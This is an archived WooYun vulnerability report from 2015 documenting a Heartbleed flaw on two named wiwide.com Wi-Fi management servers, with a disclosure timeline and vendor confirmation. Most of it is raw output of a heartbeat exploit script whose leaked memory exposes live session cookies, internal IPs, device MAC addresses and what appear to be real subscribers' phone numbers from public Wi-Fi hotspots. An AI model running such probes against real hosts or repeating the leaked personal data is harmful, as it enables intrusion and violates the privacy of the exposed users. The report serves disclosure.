乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-07: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
········
存在心脏出血的域名:wiupdate.wiwide.com 和 widash.wiwide.com 都存在在 42.159.156.137 IP上
D:\Program Files\sqlmap>openssl.py wiupdate.wiwide.com -p 443Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 5409 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response:[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#..R..T..U%Tu.Am..+.....].....pg61?64m....$....y.o$..egG....I..n.../...u/Alive..Accept: */*..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; WindowsNT 6.1; .NET CLR 2.0.50727).....HM...Gh,a...y....i`%22%20%3E%5D%3E%0A%3CmethodCall%3E%0A%20%20%3CmethodName%3E%26xxe%3B%3C/methodName%3E%0A%3C/methodCall%3E#...\[email protected]. Keep-Alive..`.T...O.....O.....h..0.6....O.T.....`.U..U....|[email protected]@..C@[email protected]@..D@[email protected]...! ....p.A.....P+A...@.>[email protected][email protected].....+A.@.>.....JY....~mp..mp.....X.A.'..mp..mp.....b.A.0..mp..mp.....h.AV..W&.]...mp..mp.....l.A~...mp..mp.....y.A.... A.....p-A... ZS.(.A..@[email protected][email protected]. ZS...user-agentaccepthostcache-controlconnection.....P.I...Amp,r._.I.....>[email protected]#A.D.D.....>[email protected].... `[email protected]"[email protected].....`&A.....P#A.`&[email protected]....$A..#A.....P#A#A.....p$A..#A...P&[email protected]...$.R.....$.R.....R.R.....`jl...G.G,r.G.G.....P.G.GMGMG"A*J.d.A.....A+A.....P-A.....`.C...R.R..*J..*J..+J. .J..+J...."..o.o...`.G,rFC,r.....H.`jl .@..... `.`[email protected].>)A.."A"A...`.A"A.....!.GET /dash/update/?ip=10.40.157.253&mac=00:1F:7A:AA:99:0A&memfree=86752&cpu=44.89&ssid=Burger%20King%20%20Free%20Wi-Fi&pssid=My_WiFi&ssid3=&ssid4=&users=4&top_users=+44592,43567,1025,34:80:b3:a5:58:09,15942634956x%ED,1537+21596,1718,19878,00:88:65:a4:4d:f3,13859593880x%ED,644+1959,1499,460,44:6d:6c:f5:47:ca,13842881466x%ED,1721+1208,621,587,f0:25:b7:5a:c5:6f,15640995395x%ED,1473&dnatusers=0&dnat_users=&weixin=&uptime=6d:17h:08m&gateway=10.40.157.1&routes=10.40.157.1&rssi=z&type=0&gw-qual=255&NTR=999-KB/s&hops=1&RTT=0&nbs=z&rank=z&nodes=z&batman=z&Version=1383128283&kbup=21950&kbdown=47405&loadlevel=30&upspeed=3&downspeed=38&robin=v2.2.7 HTTP/1.0..Host: widash.wiwide.com..X-Real-Ip: 59.45.68.81..X-Forwarded-For: 59.45.68.81..Connection: close..User-Agent: Wget/1.11.4..Accept: */*..Cache-Control: max-stale=0....=10.."[email protected]..,r...N.(#A...A.....R.....C/...$A..$A$A....$A..$A%A`....6$...%A.$%A...../%A~..;%A.F%A.....L%A....0.*..V%A.c%A.....z%A...../f.I.%A.....,..%A%A.....4....%A..%A%AV..W&.]...%A.....>..&A.....B&A.....200 OKServer.nginx/1.1.19.serverDate.Thu, 02 Jul 2015 04:20:02 GMT.dateContent-Type.text/plain.content-typeConnection.close.connectionX-Powered-By.PHP/5.3.10-1ubuntu3.13.x-powered-bySet-Cookie.PHPSESSID=e1p17eg9vc2q5uueg1so08b1i7; path=/.set-cookieExpires.Thu, 19 Nov 1981 08:52:00 GMT.expiresCache-Control.no-store, no-cache, must-revalidate, post-check=0, pre-check=0.cache-control..$A'A.....x&A...<....'A..'A(A..'A(AV..W&.]...(A.....>.#(A.....b(A.....200 OKServer.nginx/1.1.19.serverDate.Thu, 02 Jul 2015 04:20:00 GMT.dateContent-Type.text/plain.content-typeConnection.close.connectionX-Powered-By.PHP/5.3.10-1ubuntu3.13.x-powered-bySet-Cookie.PHPSESSID=1l0d90kivu6rptdld1o8mfj6l4; path=/.set-cookieExpires.Thu, 19 Pragma.no-cache.pragmaex .A.....he-Contrtext/plaine, no-.)A)A....(A)A.HTTP/1.1 200 OK..Server: nginx/1.1.19..Date: Thu, 02 Jul 2015 04:18:32 GMT..Content-Type: text/plain..Connection: close..X-Powered-By: PHP/5.3.10-1ubuntu3.13..Set-Cookie: PHPSESSID=e1p17eg9vc2q5uueg1so08b1i7; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache....jmde0(A.>[email protected][email protected]..... F,r+A)A.....1.305lidate, post-check=0, pre-check=0..Pragma: no-cache..P*AYS...0.N.....P.A.I.....A....f.>>.o...P{C.F.....P{C.E.E..*J..*J..+J. .J..+J....a..o...P...o...`.G..FC.H.`jl .@..... `.`...@}R.G9A.c2A.....c2A...p/A.....c2A.....!.GET /dash/update/?ip=192.168.0.100&mac=00:1F:7A:AC:35:B0&robin=v789-21&batman=&memfree=8564&ssid=MY-JJ&pssid=JACK%20&%20JONES&cpu=3.69&type=0&Version=1432797362&weixin=0&users=6&kbup=184&kbdown=2411&top_users=+94,65,29,a0:86:c6:f8:d0:66,13681503274,1784+84,33,51,00:27:09:11:31:1a,13439910435,10073+8,2,6,50:9f:27:95:59:c0,15010882610,10982+59,44,15,cc:07:ab:c7:2c:6f,15611049307,11131+2350,2267,83,d0:7a:b5:dd:25:61,13521731080,9070+0,0,0,40:cb:a8:cf:1e:ed,18301556982,10442&uptime=0d:3h:19m-91&gateway=192.168.0.1&gw-qual=255&NTR=999-KB/s&routes=192.168.0.1&hops=1&RTT=0&nbs=z&rank=z&nodes=z&rssi=z HTTP/1.0..Host: widash.wiwide.com..X-Real-Ip: 222.131.15.109..X-Forwarded-For: 222.131.15.109..Connection: close..User-Agent: Wget/1.11.4..Accept: */*....2A.8...@}R.X...0.N.N..2A.....E.....C/...4A..4A4A....4A..4A4A`....6$...4A..4A4A~...4A..5A5A....0.*...5A.#5A.....:5A...../f.IF5A.....,.Q5A.....~5A.....4....5A..5A5AV..W&.]...5A.....>..5A6A.....200 OKServer.nginx/1.1.19.serverDate.Thu, 02 Jul 2015 04:20:15 GMT.dateContent-Type.text/plain.content-typeConnection.close.connectionX-Powered-By.PHP/5.3.10-1ubuntu3.11.x-powered-bySet-Cookie.PHPSESSID=conqavqm6l0hb42jd14t5hr6i5; path=/.set-cookieExpires.Thu, 19 Nov 1981 08:52:00 GMT.expiresCache-Control.no-store, no-cache, must-revalidate, post-check=0, pre-check=0.cache-control3`4A.....6R3UmYhy86A...<....7A..7A7A.....2f HTTP/1.0..Host: 192.168.1.26..Connection: close..Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8..User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; vivo X5Max L Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36..Accept-Encoding: gzip,deflate..AcceptPragma.no-cache.pragma;q ~R.....okie: _gtext/[email protected]/1.1 200 OK..Server: nginx/1.1.19..Date: Thu, 02 Jul 2015 04:18:31 GMT..Content-Type: text/plain..Connection: close..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Set-Cookie: PHPSESSID=conqavqm6l0hb42jd14t5hr6i5; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache...7A.G...0.N.....@}R.I.....R...@}R.k..... F..:A9A.....0.344.....1.v.....1.v.....v.v.....`jl...G.G...G.G.....P.G.GMGMG.....x.R*J.....\.T.R.....R...R...Q..=>.o....=>.o...`=A.....`=A.....56&mac=00:1F:7A:A9:08:A2&memfree=82628&cpu=98.99&ssid=HKL&pssid=My-WiFi&ssid3=&ssid4=&users=4&top_users=+79,35,44,84:7a:88:6f:6c:dc,15559557711%ED,814+254,183,71,80:ea:96:1a:ad:9b,13666092960,229+211,109,102,68:df:dd:8c:0a:d6,13774680136%ED,830+168,104,64,7c:1d:d9:70:c5:74,13860185289%ED,711&dnatusers=14&dnat_users=38:bc:1a:9e:93:f9,c8:ae:9c:c7:14:f7,30:d6:c9:a6:c8:c7,c4:6a:b7:eb:44:ba,34:80:b3:10:e3:a5,20:a2:e4:9c:37:9c,20:a2:e4:9c:37:9c,84:fc:fe:95:14:8f,18:59:36:88:07:67,b8:b4:2e:2b:31:54,18:f6:43:9c:0f:47,70:3e:ac:41:f5:2c,8c:bf:a6:0b:0e:23,f4:8b:32:17:4e:0f,&weixin=&uptime=2d:17h:15m&gateway=10.200.200.254&routes=10.200.200.254&rssi=z&type=0&gw-qual=255&NTR=999-KB/s&hops=1&RTT=0&nbs=z&rank=z&nodes=z&batman=z&Version=1435808308&kbup=281&kbdown=431&loadlevel=30&upspeed=16&downspeed=2&robin=v2.2.7 HTTP/1.0..User-Agent. Wget/1.11.4..Accept. */*..Host. wiupdate.wiwide.com..Connection. Keep-Alive..p*D*D.l*DAA....QAQA.....p.r....AA.r.r..H=....0.*....r...r.r...../f.I..r.....,...r.r.....4.....r. .r.....>.rV..W&.]..E.r.....>.S.r.r.....<...H.r.O.r.....X.r....ZA....P?...A..@s.`[email protected]?.....JYA...A.....XHA.'...A...A.....bHA.0...A...A.....hHA~....A. .A.....lHA...x\A.Pragma.no-cache.....8PA.r... I=.lRS..@..`[email protected]S..0r. [email protected].'.YRS.aRSLA.0.fRS.lRSLA~...RS..RSLA.....4AH.4AH.;AH. .J.DAH...xNA.....xNA....KA.....xNA.....!.(JA...p1AVAZA....N..o.o...`.G.....p1AFC.....p1A.....H.`jl .@..... `.`....:A.R.....`RA.GET /dash/update/?ip=10.254.169.152&mac=00:1F:7A:AA:FD:4A&memfree=95840&cpu=0.79&ssid=Hospital_WIFI&pssid=SDSLYY&ssid3=&ssid4=&users=0&top_users=&dnatusers=7&dnat_users=64:76:ba:2a:0f:f5,d0:a6:37:93:3user-agentaccepthostconnectionc:....f:fd:82:75,48:5a....30:d..D.D.x.G...M...D.D.....`.r.D.D.WARNING: server returned more data than it should - server is vulnerable!D:\Program Files\sqlmap>
危害等级:中
漏洞Rank:6
确认时间:2015-07-09 09:43
部分服务器遗留老版本的openssl导致,感谢提交
暂无
